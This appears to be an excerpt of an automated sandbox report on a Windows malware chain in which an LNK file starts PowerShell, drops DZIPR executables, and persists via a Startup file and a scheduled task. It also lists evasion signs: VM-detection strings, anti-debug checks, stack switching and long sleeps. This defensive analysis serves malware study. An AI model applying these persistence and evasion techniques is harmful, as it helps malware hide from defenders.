Source:	Binary string: wntdll.pdbUGP source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: DZIPR.exe, 0000000C.00000002.1399123112.000000000368C000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1399842267.00000000039E0000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678356739.00000000051C4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1678669342.0000000005660000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826783062.0000000005050000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000014.00000002.1826497519.0000000004BBF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679610017.0000000004B50000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.1679327231.00000000046B7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009328373.0000000004EC1000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2009680623.0000000005360000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827714812.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.1827577204.0000000004BB9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075134750.0000000004DE7000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2075461618.0000000005280000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009447440.0000000005660000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.2009119832.00000000051C0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075477794.0000000004B90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000021.00000002.2075275794.0000000004839000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: hello.exe, 0000000B.00000003.1378606402.0000000002751000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 0000000C.00000002.1400939123.000000006FE48000.00000002.00000001.01000000.00000006.sdmp, DZIPR.exe, 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000013.00000002.1630879688.000000006FEC8000.00000002.00000001.01000000.00000009.sdmp, DZIPR.exe, 00000017.00000002.1825706075.0000000070128000.00000002.00000001.01000000.00000009.sdmp, DZIPR.dll.11.dr

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

Source: DZIPR.dll.11.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.12.dr	Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: lejp.20.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: rjhlrgwt.28.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: hello.exe.3.dr	Static PE information: real checksum: 0x33302 should be: 0x4a3c93
Source: paogviura.14.dr	Static PE information: real checksum: 0x0 should be: 0x7d505
Source: gnqpmvvlbu.24.dr	Static PE information: real checksum: 0x0 should be: 0x7d505

Source: DZIPR.exe.11.dr	Static PE information: section name: .didata
Source: DZIPR.exe.12.dr	Static PE information: section name: .didata
Source: paogviura.14.dr	Static PE information: section name: cmxvoc
Source: lejp.20.dr	Static PE information: section name: cmxvoc
Source: gnqpmvvlbu.24.dr	Static PE information: section name: cmxvoc
Source: rjhlrgwt.28.dr	Static PE information: section name: cmxvoc

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00411C20 push eax; ret	11_2_00411C4E
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE35401 push ecx; ret	12_2_6FE35414
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE351A1 push ecx; ret	12_2_6FE351B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C925401 push ecx; ret	13_2_6C925414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C9251A1 push ecx; ret	13_2_6C9251B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB5401 push ecx; ret	19_2_6FEB5414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEB51A1 push ecx; ret	19_2_6FEB51B4

Persistence and Installation Behavior

Windows shortcut file (LNK) starts blacklisted processes

Source: LNK file	Process created: C:\Windows\System32\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior
Source: LNK file	Process created: C:\Windows\SysWOW64\cmd.exe	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\hello.exe	Jump to dropped file
Source: C:\Users\user\DZIPR.exe	File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.dll			Jump to dropped file
Source: C:\Users\user\AppData\Roaming\hello.exe	File created: C:\Users\user\DZIPR.exe			Jump to dropped file

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Windows\Tasks\lnfast_x64.job

Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BITE1BA.tmp

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\PAOGVIURA
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\LEJP
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GNQPMVVLBU
Source: C:\Windows\SysWOW64\cmd.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\RJHLRGWT

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2DE29 IsIconic,GetWindowPlacement,GetWindowRect,	12_2_6FE2DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91DE29 IsIconic,GetWindowPlacement,GetWindowRect,	13_2_6C91DE29
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEADE29 IsIconic,GetWindowPlacement,GetWindowRect,	19_2_6FEADE29

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\hello.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7C44
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API/Special instruction interceptor: Address: 6C9B7945
Source: C:\Windows\SysWOW64\cmd.exe	API/Special instruction interceptor: Address: 6C9B3B54
Source: C:\Windows\SysWOW64\explorer.exe	API/Special instruction interceptor: Address: F3A317

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4968			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4876			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\paogviura	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\gnqpmvvlbu	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lejp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\rjhlrgwt	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_13-18189
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep	graph_12-18714
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_13-18286
Source: C:\Users\user\DZIPR.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess	graph_12-18811

Source: C:\Users\user\DZIPR.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.1 %
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API coverage: 4.3 %

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6500	Thread sleep count: 4968 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 712	Thread sleep count: 4876 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6692	Thread sleep time: -13835058055282155s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4460	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 7908	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File opened: PhysicalDrive0

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,	11_2_0040301A
Source: C:\Users\user\AppData\Roaming\hello.exe	Code function: 11_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,	11_2_00402B79
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE2748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	12_2_6FE2748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 13_2_6C91748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	13_2_6C91748E
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	Code function: 19_2_6FEA748E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,	19_2_6FEA748E

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior

Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: noreply@vmware.com0
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1!0
Source: DZIPR.exe, 0000000C.00000002.1398188269.000000000343A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 6vmware
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: svchost.exe, 00000012.00000002.2496354459.00000174C5854000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.1
Source: explorer.exe, 00000021.00000002.2075133244.00000000046FF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.0
Source: hello.exe, 0000000B.00000002.1401612275.0000000000621000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y%
Source: svchost.exe, 00000012.00000002.2495105676.00000174C002B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0Z

Source: C:\Users\user\DZIPR.exe	API call chain: ExitProcess graph end node	graph_12-18812
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node	graph_13-18287
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\DZIPR.exe

Code function: 12_2_6FE33F34 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

12_2_6FE33F34

Source: C:\Users\user\AppData\Roaming\hello.exe

Code function: 11_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,

11_2_00406D5D

Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25D78 mov eax, dword ptr fs:[00000030h]	12_2_6FE25D78
Source: C:\Users\user\DZIPR.exe	Code function: 12_2_6FE25CA0 mov eax, dword ptr fs:[00000030h]	12_2_6FE25CA0
